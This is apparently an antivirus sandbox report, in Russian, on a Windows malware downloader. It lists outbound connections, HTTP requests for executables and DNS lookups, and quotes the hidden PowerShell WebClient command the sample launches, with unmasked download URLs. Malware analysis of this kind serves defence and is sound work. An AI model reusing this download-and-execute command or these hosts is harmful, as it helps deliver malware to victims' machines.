Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Сетевая активность
Подключается к
- 'pa#####desanlucar.com':80
- 'pa#####desanlucar.com':443
- 'ir###.web.tr':80
- 'ir###.web.tr':443
- 'er###eb.co.za':80
TCP
Запросы HTTP GET
- http://pa#####desanlucar.com/apkgbud.exe
- http://ir###.web.tr/exontvn.exe
Другие
- 'pa#####desanlucar.com':443
- 'ir###.web.tr':443
UDP
- DNS ASK pa#####desanlucar.com
- DNS ASK ir###.web.tr
- DNS ASK ch####hinenow.com
- DNS ASK eb###asa.com
- DNS ASK er###eb.co.za
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $webclient = new-object System.Net.WebClient;$myurls = 'http://patatasdesanlucar.com/apkgbud.exe,http://irmak.web.tr/exontvn.exe,http://chimachinenow.com/oopywww.exe,http://ebrotasa.com/teqymfu...' (со скрытым окном)
